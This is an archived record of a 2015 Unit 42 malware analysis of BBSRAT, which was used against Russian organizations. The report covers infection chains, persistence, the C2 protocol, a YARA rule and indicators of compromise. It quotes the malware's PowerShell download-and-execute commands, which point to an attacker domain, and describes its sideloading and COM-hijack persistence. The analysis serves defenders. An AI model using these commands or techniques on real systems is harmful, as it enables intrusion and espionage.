{
	"id": "7ae1eae8-29f3-454b-a6b1-c08d9643964c",
	"created_at": "2026-04-06T00:13:27.383923Z",
	"updated_at": "2026-04-10T13:11:44.327881Z",
	"deleted_at": null,
	"sha1_hash": "db56e7016c89ff29a90db58668fa95512536daca",
	"title": "BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 886196,
	"plain_text": "BBSRAT Attacks Targeting Russian Organizations Linked to\r\nRoaming Tiger\r\nBy Bryan Lee, Josh Grunzweig\r\nPublished: 2015-12-22 · Archived: 2026-04-06 00:03:13 UTC\r\nIn late 2014, ESET presented an attack campaign that had been observed over a period of time targeting Russia\r\nand other Russian speaking nations, dubbed “Roaming Tiger”. The attack was found to heavily rely on RTF\r\nexploits and at the time, thought to make use of the PlugX malware family.\r\nESET did not attribute the attacks to a particular attack group, but noted that the objective of the campaign was\r\nespionage and general information stealing. Based on data collected from Palo Alto Networks AutoFocus threat\r\nintelligence, we discovered continued operations of activity very similar to the Roaming Tiger attack campaign\r\nthat began in the August 2015 timeframe, with a concentration of attacks in late October and continuing into\r\nDecember.\r\nThe adversaries behind these attacks continued to target Russia and other Russian speaking nations using similar\r\nexploits and attack vectors. However, while the malware used in these new attacks uses similar infection\r\nmechanisms to PlugX, it is a completely new tool with its own specific behavior patterns and architecture. We\r\nhave named this tool “BBSRAT.”\r\nTargeting and Infrastructure\r\nAs described in earlier reports on “Roaming Tiger”, the attack observed in August 2015 used weaponized exploit\r\ndocuments that leave Russian language decoy document files after infecting the system. The files exploit the well-known Microsoft Office vulnerability, CVE-2012-0158, to execute malicious code in order to take control of the\r\ntargeted systems.\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 1 of 18\n\nFigure 1 Spear-phishing email delivering BBSRAT\r\nIn one case, the adversary impersonated an individual from the organization Vigstar, a Russian-based research\r\norganization in charge of the development of satellite communications and special purpose wireless devices for\r\nthe Russian Federation’s defense and security agencies. The targeted email address appeared to be a Gmail\r\naccount associated with Vigstar as well, and was found on a job board website for a job opening at Vigstar.\r\nThe rough translation of the body of the email is as follows:\r\nI send you a \"list of international exhibitions of military, civil and dual-purpose, conducted in 2015 on the\r\nterritory of the Russian Federation and foreign states.\" Waiting for your reply!\r\nFigure 2 confirms that the decoy document that opens after the malware infects the system is indeed a list of\r\ninternational exhibitions that were conducted on Russian territory in 2015.\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 2 of 18\n\nFigure 2 Decoy document that is opened after the malicious document has infected the system\r\nIn more recent months, we have identified several other potential Russian victims using AutoFocus. Analysis of\r\nthe command and control (C2) infrastructure shows that the newly discovered samples of BBSRAT used the same\r\nC2 domains as previously published in the “Roaming Tiger” campaign, including transactiona[.]com and\r\nfuturesgold[.]com. Interestingly, all of the previously published C2 domains have significant overlap amongst the\r\nhashes and IPs while C2s for BBSRAT contain no overlap at all. This may indicate that for the newer attack\r\ncampaign using BBSRAT, the adversary may have deployed purpose-built variants and/or infrastructure for each\r\nof the intended targets.\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 3 of 18\n\nFigure 3 Command and control infrastructure\r\nBBSRAT Malware Analysis\r\nDeployment Technique #1\r\nBBSRAT is typically packaged within a portable executable file, although in a few of the observed instances, a\r\nraw DLL was discovered to contain BBSRAT. When the dropper first runs, it will generate a path in the\r\n%TEMP% directory. The generated filename is 10-16 uppercase alphabetic characters, and ends with a ‘.TMP’\r\nfile extension. The dropper will continue to write an embedded cab file in this location.\r\nFigure 4 Header of CAB file dropped by BBSRAT\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 4 of 18\n\nThe malware will proceed to create one of the following directories depending on what version of Microsoft\r\nWindows is running on the target machine:\r\n%ALLUSERSPROFILE%\\SSONSVR\r\n%ALLUSERSPROFILE%\\Application Data\\SSONSVR\r\nUsing the built-in expand.exe utility provided by Microsoft Windows, the dropper executes the following\r\ncommand, which will expand the CAB file and write the results to the provided directory:\r\nexpand.exe \"%TEMP%\\[temp_file]\" Destination \"[chosen_path]\\SSONSVR\"\r\nThis results in the following three files being written to the SSONSVR directory:\r\naclmain.sdb\r\npnipcn.dll\r\nssonsvr.exe\r\nThe 'ssonsvr.exe' file is a legitimate Citrix executable that will be used to sideload the malicious ‘pnipcn.dll’ file.\r\nThe ‘aclmain.sdb’ file contains code that will eventually be loaded by the ‘pnipcn.dll’ file.\r\nThe malware finally executes ‘ssonsvr.exe’ via a call to ShellExecuteW.\r\nFigure 5 Execution flow of dropper expanding CAB file\r\nWhen ‘ssonsvr.exe’ is executed, and the pnipcn.dll file is loaded, it will begin by identifying the path to\r\nmsiexec.exe, by expanding the following environment string:\r\n%SystemRoot%\\System32\\msiexec.exe\r\nIt will then spawn a suspended instance of msiexec.exe in a new process. The malware proceeds to load code from\r\nthe ‘aclmain.sdb’ file and performs process hollowing against this instance of msiexec.exe prior to resuming the\r\nprocess.\r\nFigure 6 Sideloading execution flow\r\nIn order to ensure persistence, the following registry key is written on the victim’s machine:\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 5 of 18\n\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ssonsvr.exe : [path_to_ssonsvr.exe]\r\nDeployment Technique #2\r\nIn the most recently observed sample of BBSRAT found in AutoFocus, the Trojan was deployed via a downloader\r\nthat used the Invoke-ReflectivePEInjection.ps1 script from the PowerSploit framework.\r\nWhen the downloader executes, it will first decrypt the following two strings using a 5-byte XOR key of\r\n“\\x01\\x02\\x03\\x04\\x05”:\r\n\"powershell -exec bypass -c IEX (New-Object\r\nNet.WebClient).DownloadString('http://testzake[.]com/IR.ps1');Invoke-ReflectivePEInjection -PEUrl\r\nhttp://testzake[.]com/s.exe\"\r\n\"C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell -exec bypass -c IEX (New-Object\r\nNet.WebClient).DownloadString('http://testzake[.]com/IR.ps1');Invoke-ReflectivePEInjection -PEUrl\r\nhttp://testzake[.]com/s.exe\"\r\nThese strings are then sequentially executed via calls to WinExec. As we can see, the second command is\r\nspecifically crafted to run on 64-bit versions of Microsoft Windows. The commands in question will download an\r\nexecutable file and run it within the context of the powershell process.\r\nWhen the above commands are executed, the downloader will initially download the ‘IR.ps1’ powershell script\r\nfrom the specified URL:\r\nFigure 7 Downloader downloading the Invoke-ReflectivePEInjection PowerSploit script\r\nThis Powershell script appears to have been pulled directly from the PowerSploit framework, with no\r\nmodifications made. The malware then invokes this script with a URL that points to an additional executable file.\r\nThis downloaded executable contains a copy of the BBSRAT malware family.\r\nThe downloader proceeds to drop either a 32-bit or 64-bit DLL file that will execute the two previously stated\r\nPowershell commands when the DLL is loaded. This DLL is dropped to one of the following locations:\r\n%SYSTEMROOT%\\web\\srvcl32.dll\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 6 of 18\n\n%APPDATA%\\web\\srvcl32.dll\r\nAdditionally, the following registry keys are set depending on the system’s CPU architecture:\r\nHKU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32\\ThreadingModel -\r\n\"Both\"\r\nHKU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32\\Default -\r\n[path_to_srvcl32.dll]\r\nHKLM\\SOFTWARE\\Classes\\CLSID\\{F3130CDB-AA52-4C3A-AB32-\r\n85FFC23AF9C1}\\InprocServer32\\ThreadingModel - \"Both\"\r\nHKLM\\SOFTWARE\\Classes\\CLSID\\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\\InprocServer32\\Default -\r\n[path_to_srvcl32.dll]\r\nThe COM object for {42aedc87-2188-41fd-b9a3-0c966feabec1} is specific to ‘MruPidlList’, while the COM\r\nobject for {F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1} is specific to ‘Microsoft WBEM New Event\r\nSubsystem’. This ensures that the DLL specified will load when Microsoft Windows starts. It is a technique that\r\nwas used by the ZeroAccess rootkit when it initially surfaced.\r\nBBSRAT Execution\r\nAfter being loaded using one of the two techniques discussed, BBSRAT malware begins execution by loading the\r\nfollowing libraries at runtime:\r\nntdll.dll\r\nkernel32.dll\r\nuser32.dll\r\nadvapi32.dll\r\ngdi32.dll\r\nws2_32.dll\r\nshell32.dll\r\npsapi.dll\r\nSecur32.dll\r\nWtsApi32.dll\r\nNetapi32.dll\r\nVersion.dll\r\nCrypt32.dll\r\nWininet.dll\r\nThe following mutex is then created to ensure a single instance of BBSRAT is running at a given time:\r\nGlobal\\GlobalAcProtectMutex\r\nThroughout the execution of BBSRAT, it will dynamically load functions prior to calling them, as seen in the\r\nexample below demonstrating BBSRAT making a call to the WSAStartup function:\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 7 of 18\n\nFigure 8 BBSRAT calling WSAStartup function\r\nThe malware proceeds to parse the stored embedded network configuration and spawns a series of threads\r\nresponsible for network communication. This includes a series of HTTP or HTTPS requests, such as the\r\nfollowing:\r\nGET /bbs/1/forum.php?sid=1 HTTP/1.1\r\nCookie: A46A8AA9-D7D6-43FB-959DC96E\r\nContent-Length:\r\nUser-Agent: Mozilla/4.0 (compatible; Windows NT 5.1)\r\nConnection: Keep-Alive\r\nHost: transactiona[.]com\r\nCache-Control: no-cache\r\nAccept: */*\r\nContent-Type:\r\nIn the above example, the ‘1’ used both in the URI and the sid GET parameter is a global incremental counter.\r\nEvery subsequent request made by BBSRAT increments this counter by one. Additionally, all variants of BBSRAT\r\nwe have found use the same URL for command and control (C2) communication.\r\nWhen first executed, the malware will exfiltrate data about the victim’s machine via a POST request to the\r\n‘/bbs/[counter]/forum.php?sid=[counter]’ URL. All network data sent via POST requests uses a custom binary\r\nstructure, as defined as the following:\r\n1\r\n2\r\n3\r\n4\r\n5\r\nstruct network_header\r\n{\r\nDWORD random;\r\nDWORD hardcoded0;\r\nDWORD hardcoded1;\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 8 of 18\n\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\nDWORD command;\r\nDWORD length_of_compressed_data;\r\nDWORD length_of_decompressed_data;\r\nDWORD unknown2;\r\nBYTE compressed_data[];\r\n};\r\nThe compressed_data field is compressed using the common ZLIB compression algorithm. Additionally, in the\r\nevent data is being sent via HTTP rather than HTTPS, the following additional encryption algorithm is applied to\r\nthe POST data:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\ndef decrypt(data):\r\nout = []\r\nfor x in data:\r\nt = (ord(x) - 23)\r\nt1 = (t ^ 62)\r\nt2 = (t1 + 23) \u0026 0xFF\r\nout.append(chr(t2))\r\nreturn out\r\nThe following data structure holds the victim’s information that is uploaded by BBSRAT:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\nstruct victim_information\r\n{\r\nDWORD static_value;\r\nDWORD major_version;\r\nDWORD minor_version;\r\nDWORD build_number;\r\nDWORD platform_id;\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 9 of 18\n\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\nDWORD default_locale;\r\nDWORD unknown;\r\nDWORD local_ip_address;\r\nDWORD running_as_64_bit;\r\nDWORD random;\r\nDWORD unknown2;\r\nDWORD struct_length;\r\nDWORD struct_with_not_used_length;\r\nDWORD struct_with_username_length;\r\nDWORD struct_with_group_length;\r\nDWORD unknown3;\r\nDWORD struct_with_hostname_length;\r\nWCHAR not_used[??];\r\nWCHAR username[??];\r\nWCHAR group[??];\r\nWCHAR hostname[??];\r\n};\r\nBBSRAT accepts many possible commands that the C2 server can provide. These commands are sent as a\r\nresponse to the GET beacons that are continually requested via either HTTP or HTTPS. The following commands\r\nand sub-commands have been identified:\r\nCommand Sub-command Description\r\n0x110010 N/A Beacon\r\n0x110011 N/A Uninstall/Kill Malware\r\n0x110020 N/A Upload Victim Information\r\n0x110064 0x2 Execute Command and Return Response\r\n0x110064 0x4 Unknown\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 10 of 18\n\n0x110064 0x5 Execute Shellcode\r\n0x110066 0x7 Query Service Configuration\r\n0x110066 0x9 Start Service\r\n0x110066 0xa Stop Service\r\n0x110066 0xb Delete Service\r\n0x110066 0xc Change Service Configuration\r\n0x110063 0xd Enumerate Running Processes\r\n0x110063 0xf Kill Process\r\n0x110063 0x10 Get Process Information\r\n0x110063 0x12 Free Library for Specified Process\r\n0x110065 0x1b Execute Command Quietly\r\n0x110065 0x1e Send Input to Console\r\n0x110065 0x1f Execute Shellcode\r\n0x110061 0x20 List Drive Information\r\n0x110061 0x21 List File Information For Given Directory\r\n0x110061 0x23 Write File\r\n0x110061 0x24 Read File\r\n0x110061 0x25 List File Information For Given Directory\r\n0x110061 0x27 Perform File Operation via SHFileOperation()\r\n0x110061 0x28 Delete File\r\n0x110061 0x29 Create Directory\r\n0x110061 0x2a Shell Execute\r\nPlease refer to the appendix for a full list of identified BBSRAT samples and their associated C2 servers.\r\nConclusion\r\nAs in many of the previous articles regarding espionage-motivated adversaries and possible nation-state\r\ncampaigns, what is being observed in this attack campaign is a continued operation and evolution by the adversary\r\neven after its tactics, techniques, and procedures (TTPs) have become public knowledge. Despite the fact that the\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 11 of 18\n\ninformation about these attackers has been public for over a year, including a listing of many of the command and\r\ncontrol servers, they continue to reuse much of their exposed playbook. We urge organizations to use the data\r\nfrom Unit 42 and other threat intelligence sources is paramount to proactively secure themselves and prevent\r\nattacks.\r\nWildFire properly classifies BBSRAT malware samples as malicious. We have released DNS signatures to block\r\naccess to the C2 domain names included in this report. AutoFocus users can explore these attacks using the\r\nBBSRAT malware family tag.\r\nAppendix\r\nYARA Rule\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\nrule bbsrat {\r\nmeta:\r\nauthor = \"Tyler Halfpop\"\r\ncompany = \"Palo Alto Networks\"\r\nlast_updated = \"12-16-15\"\r\nstrings:\r\n$sa0 = \"%ALLUSERSPROFILE%\\\\SSONSVR\" fullword wide\r\n$sa1 = \"%ALLUSERSPROFILE%\\\\Application Data\\\\SSONSVR\" fullword wide\r\n$sa2 = \"\\\\ssonsvr.exe\" fullword wide\r\n$oa0 = { 83 E8 01 88 0C 04 75 F8 8B 44 24 40 89 4C 24 18 89 4C 24 1C 89 4C 24 30 89 4C 24 34 89\r\n4C 24 20 89 4C 24 38 8D 0C 24 51 C7 44 24 04 3C 00 00 00 C7 44 24 08 40 00 00 00 C7 44 24 10 70\r\n20 40 00 C7 44 24 14 A0 20 40 00 89 44 24 18 FF 15 54 20 40 00 85 C0 75 04 83 C4 3C C3 }\r\n$oa1 = { 75 11 5F 5E B8 0D 00 00 00 5B 81 C4 ?? 07 00 00 C2 10 00 53 68 80 00 00 00 6A 02 53 6A\r\n02 6A 02 8D 54 24 ?? 52 89 5C 24 30 FF 15 38 20 40 00 }\r\n$sb0 = \"%systemroot%\\\\Web\\\\\"\r\n$sb1 = \"srvcl32.dll\"\r\n$ob0 = { B8 67 66 66 66 F7 E9 D1 FA 8B C2 C1 E8 1F 03 C2 8D 04 80 8B D1 2B D0 8A 44 94 04 30\r\n81 08 58 40 00 41 3B CE 7C DA B8 08 58 40 00 5E 83 C4 14 C3 }\r\n$ob1 = { 8D 84 24 18 02 00 00 50 C7 84 24 1C 02 00 00 94 00 00 00 FF 15 4C 20 40 00 8B 8C 24 20\r\n02 00 00 0F B7 94 24 1C 02 00 00 C1 E9 10 0B CA 83 F9 06 0F 85 7F 00 00 00 }\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 12 of 18\n\n19\r\n20\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 300KB and (all of ($sa*) or all of ($oa*) or all of ($sb*) or all of\r\n($ob*))\r\n}\r\nBBSRAT Samples\r\nMD5 EF5FA2378307338D4E75DECE88158D77 (Sample Analyzed)\r\nSHA1 574230D89EABDE0B6F937CD718B3AD19BB4F5CE3\r\nSHA256 FC4B465EE8D2053E9E41FB0A6AE32843E4E23145845967A069E584F582279725\r\nCompile Time 2014-12-26 17:17:00 UTC\r\nNetwork Protocol HTTPS\r\nC2 Server(s)\r\ntransactiona[.]com\r\nfinancenewsru[.]net\r\nMD5 2254A1CA05DB87D9D58A71DDB97C7395\r\nSHA1 65B17D3FF68D25392A9B0B9E25A275540DFB4E8D\r\nSHA256 567A5B54D6C153CDD2DDD2B084F1F66FC87587DD691CD2BA8E30D689328A673F\r\nCompile Time 2015-11-04 07:14:33 UTC\r\nNetwork\r\nProtocol\r\nHTTPS\r\nC2 Server(s)\r\njowwln[.]cocolco[.]com\r\npagbine[.]ofhloe[.]com\r\ncdaklle[.]housejjk[.]com\r\nMD5 74A41C62D9EC1164AF82B802DA3E8B3E\r\nSHA1 D390E0965823E42584F2799EF0E8161A6540AF3E\r\nSHA256 77A2E26097285A794E42C9E813D14936D0E7A1DD3504205DD6B28A71626F8C3C\r\nCompile Time 2015-11-04 07:14:33\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 13 of 18\n\nNetwork Protocol HTTPS\r\nC2 Server(s) kop[.]gupdiic[.]com\r\nMD5 C17534E4B61C08A7646CDC64574B429B\r\nSHA1 931BAB999568C228616430A5AEDFEDFC34E1F151\r\nSHA256 61A692E615E31B97B47A215479E6347FBD8E6E33D7C9D044766B4C1D1AE1B1FB\r\nCompile Time 2015-11-04 07:14:33 UTC\r\nNetwork Protocol HTTPS\r\nC2 Server(s) herman[.]eergh[.]com\r\nMD5 C7C79393E762E7ED925F42D3C899BA60\r\nSHA1 7406B11851200D0ADA1A8334107182D636738CE5\r\nSHA256 B1737F3A1C50CB39CD9938D5EC3B4A6A10B711F17E917886481C38967B93E259\r\nCompile Time N/A\r\nNetwork Protocol HTTP\r\nC2 Server(s) 211.44.42[.]55\r\nMD5 0EA888E970345B2FBFD74B369FE46DDD\r\nSHA1 EB4F9BDE2FFAE863E0D7AD5848A758D59224C3F7\r\nSHA256 56D878EDD61176CA30D4A41555671161158E94E8A50E5482985F42C4E4843CB5\r\nCompile Time 2015-08-25 09:33:57 UTC\r\nNetwork Protocol HTTPS\r\nC2 Server(s)\r\ncrew[.]wichedgecrew[.]com\r\nblueway[.]garmio-drive[.]com\r\nhelloway[.]floretdog[.]com\r\nMD5 FA944818A939456A7B6170326C49569F\r\nSHA1 0EB3AE28A7A7D97ABA30DA4E8EB0A4AB36EFD035\r\nSHA256 22592A32B1193587A707D8B20C04D966FE61B37F7DEF7613D9BB91FF2FE9B13B\r\nCompile Time 2015-08-25 09:33:57 UTC\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 14 of 18\n\nNetwork Protocol HTTPS\r\nC2 Server(s)\r\npanaba[.]empleoy-plan[.]com\r\nkop[.]gupdiic[.]com\r\npeak[.]measurepeak[.]com\r\nMD5 896691AE546F498404F5884607D6EB50\r\nSHA1 91A176EB5B2436762B9898075EC66042E33615A3\r\nSHA256 13D0BD83A023712B54C1DD391DFC1BC27B22D9DF4FE3942E2967EC82D7C95640\r\nCompile Time N/A\r\nNetwork\r\nProtocol\r\nHTTP\r\nC2 Server(s) 211.44.42[.]55\r\nMD5 A78B9438117963A9A18B2F056888498B\r\nSHA1 98E79C065DB88B4686AB5B7C36C4524333D64C48\r\nSHA256 E049BD90028A56B286F4B0B9062A8DF2AB2DDF492764E3962F295E9CE33660E3\r\nCompile Time 2014-12-26 17:17:00 UTC\r\nNetwork Protocol HTTP\r\nC2 Server(s)\r\n211.44.42[.]55\r\nsupport.yandexmailru[.]kr\r\nMD5 B4927EAC9715014E17C53841FEEDF4E1\r\nSHA1 26E8CFD13175B67C12FC72A11FBDBC749F0B61C0\r\nSHA256 2D81D65D09BF1B864D8964627E13515CEE7DEDDFBD0DC70B1E67F123AB91421E\r\nCompile Time 2014-12-26 17:17:00 UTC\r\nNetwork\r\nProtocol\r\nHTTPS\r\nC2 Server(s) kop[.]gupdiic[.]com\r\npanaba[.]empleoy-plan[.]com\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 15 of 18\n\npeak[.]measurepeak[.]com\r\nMD5 41A02CAF0A0D32FAD5418425F9973616\r\nSHA1 CC83EA6EF4763F24193D56359590BB34127DD36E\r\nSHA256 7438ED5F0FBE4B26AFED2FE0E4E4531FC129A44D8EA416F12A77D0C0CD873520\r\nCompile Time 2015-08-25 09:33:57 UTC\r\nNetwork\r\nProtocol\r\nHTTPS\r\nC2 Server(s)\r\nherman[.]eergh[.]com\r\nprdaio[.]unbrtel[.]com\r\nloomon[.]gupdicc[.]com\r\nMD5 AA59EE1E40D22BD22CEE19B8B6A17DF3\r\nSHA1 963E0AD3EC717253A8E74F45D3C552107D6ECACA\r\nSHA256 6FAE5305907CE99F9AB51E720232EF5ACF1950826DB520A847BF8892DC9578DE\r\nCompile Time 2014-12-26 17:17:00 UTC\r\nNetwork Protocol HTTPS\r\nC2 Server(s) winwordupdate[.]dynu[.]com\r\nMD5 B934BF027EC3A9DFCAE9D836D68BAB75\r\nSHA1 E9744516E621B233C44F5854C0DF63FFDD62FB81\r\nSHA256 0BAF36CA2D3772FDFF989E2B7E762829D30DB132757340725BB50DEE3B51850C\r\nCompile Time 2014-12-26 17:17:00 UTC\r\nNetwork Protocol HTTPS\r\nC2 Server(s)\r\ntransactiona[.]com\r\nfinancenewsru[.]net\r\nMD5 7533E65A16B4B3BA451A141F389D3A30\r\nSHA1 CB46E6234DA0A9C859C1F71FFEB86100284A0142\r\nSHA256 D579255852720D794349AE2238F084C6393419AF38479F3D0E3D2A21C9EB8E18\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 16 of 18\n\nCompile Time 2014-12-26 17:17:00 UTC\r\nNetwork Protocol HTTPS\r\nC2 Server(s)\r\nwinwordupdate[.]dynu[.]com\r\nadobeflashupdate1[.]strangled[.]net\r\nMD5 8CD233D3F226CB1BF6BF15ACA52E0E36\r\nSHA1 B955CA4AA8F7181C2252C4699718F6FEFC0B9CE3\r\nSHA256 95F198ED29CF3F7D4DDD7CF688BFEC9E39D92B78C0A1FD2288E13A92459BDB35\r\nCompile Time 2015-09-22 06:16:44 UTC\r\nNetwork\r\nProtocol\r\nHTTP\r\nC2 Server(s) www[.]testzake[.]com\r\nPowerSploit Downloader\r\nMD5 0AA391DC6D9EBEC2F5D0EE6B4A4BA1FA\r\nSHA1 D238C157F87204D03C9005AF9A9CBC28C108E50A\r\nSHA256 71DC584564B726ED2E6B1423785037BFB178184419F3C878E02C7DA8BA87C64D\r\nCompile Time 2015-09-21 11:59:18 UTC\r\nNetwork Protocol HTTP\r\nC2 Server(s) www[.]testzake[.]com\r\nIOCs\r\nHashes\r\n61a692e615e31b97b47a215479e6347fbd8e6e33d7c9d044766b4c1d1ae1b1fb\r\n22592a32b1193587a707d8b20c04d966fe61b37f7def7613d9bb91ff2fe9b13b\r\n2d81d65d09bf1b864d8964627e13515cee7deddfbd0dc70b1e67f123ab91421e\r\nd579255852720d794349ae2238f084c6393419af38479f3d0e3d2a21c9eb8e18\r\n0fc52c74dd54a97459e964b340d694d8433a3229f61e1c305477f8c56c538f27\r\n567a5b54d6c153cdd2ddd2b084f1f66fc87587dd691cd2ba8e30d689328a673f\r\n95f198ed29cf3f7d4ddd7cf688bfec9e39d92b78c0a1fd2288e13a92459bdb35\r\n6fae5305907ce99f9ab51e720232ef5acf1950826db520a847bf8892dc9578de\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 17 of 18\n\nb1737f3a1c50cb39cd9938d5ec3b4a6a10b711f17e917886481c38967b93e259\r\n71dc584564b726ed2e6b1423785037bfb178184419f3c878e02c7da8ba87c64d\r\n4ea23449786b655c495edf258293ac446f2216464b3d1bccb314ef4c61861101\r\n0baf36ca2d3772fdff989e2b7e762829d30db132757340725bb50dee3b51850c\r\n012ec51657d8724338a76574a39db4849579050f02c0103d46d406079afa1e8b\r\ne049bd90028a56b286f4b0b9062a8df2ab2ddf492764e3962f295e9ce33660e3\r\n77a2e26097285a794e42c9e813d14936d0e7a1dd3504205dd6b28a71626f8c3c\r\n5aa7db3344aa76211bbda3eaaccf1fc1b2e76df97ff9c30e7509701a389bd397\r\nfc4b465ee8d2053e9e41fb0a6ae32843e4e23145845967a069e584f582279725\r\n44171afafca54129b89a0026006eca03d5307d79a301e4a8a712f796a3fdec6e\r\n7438ed5f0fbe4b26afed2fe0e4e4531fc129a44d8ea416f12a77d0c0cd873520\r\n13d0bd83a023712b54c1dd391dfc1bc27b22d9df4fe3942e2967ec82d7c95640\r\nDomains\r\nadobeflashupdate.dynu[.]com\r\nadobeflashupdate1.strangled[.]net\r\ncdaklle.housejjk[.]com\r\nfuturesgolda[.]com\r\nherman.eergh[.]com\r\njowwln.cocolco[.]com\r\nkop.gupdiic[.]com\r\nloomon.gupdiicc[.]com\r\npagbine.ofhloe[.]com\r\npanaba.empleoy-plan[.]com\r\npeak.measurepeak[.]com\r\nprdaio.unbrtel[.]com\r\nsupport.yandexmailru[.]kr\r\nsystemupdate5.dtdns[.]net\r\ntestzake[.]com\r\ntransactiona[.]com\r\nwap.gxqtc[.]com\r\nwap.hbwla[.]com\r\nwap.kylxt[.]com\r\nwindowsupdate.dyn[.]nu\r\nwinwordupdate.dynu[.]com\r\nwww.testzake[.]com\r\nwww.yunw[.]top\r\nSource: http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 18 of 18",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/"
	],
	"report_names": [
		"bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger"
	],
	"threat_actors": [
		{
			"id": "866c0c21-8de3-4ad5-9887-cecd44feb788",
			"created_at": "2022-10-25T16:07:24.130298Z",
			"updated_at": "2026-04-10T02:00:04.875929Z",
			"deleted_at": null,
			"main_name": "Roaming Tiger",
			"aliases": [
				"Bronze Woodland",
				"CTG-7273",
				"Rotten Tomato"
			],
			"source_name": "ETDA:Roaming Tiger",
			"tools": [
				"Agent.dhwf",
				"AngryRebel",
				"BBSRAT",
				"Destroy RAT",
				"DestroyRAT",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"Kaba",
				"Korplug",
				"Moudour",
				"Mydoor",
				"PCRat",
				"PlugX",
				"RedDelta",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Xamtrav"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5afe7b81-e99a-4c24-8fcc-250fb0cf40a3",
			"created_at": "2023-01-06T13:46:38.324616Z",
			"updated_at": "2026-04-10T02:00:02.928697Z",
			"deleted_at": null,
			"main_name": "Roaming Tiger",
			"aliases": [
				"BRONZE WOODLAND",
				"Rotten Tomato"
			],
			"source_name": "MISPGALAXY:Roaming Tiger",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ee9a20b1-c6d6-42da-909d-66e7699723d1",
			"created_at": "2025-08-07T02:03:24.704306Z",
			"updated_at": "2026-04-10T02:00:03.722506Z",
			"deleted_at": null,
			"main_name": "BRONZE WOODLAND",
			"aliases": [
				"CTG-7273 ",
				"Roaming Tiger ",
				"Rotten Tomato "
			],
			"source_name": "Secureworks:BRONZE WOODLAND",
			"tools": [
				"Appat",
				"BbsRAT",
				"PlugX",
				"Zbot"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434407,
	"ts_updated_at": 1775826704,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/db56e7016c89ff29a90db58668fa95512536daca.pdf",
		"text": "https://archive.orkl.eu/db56e7016c89ff29a90db58668fa95512536daca.txt",
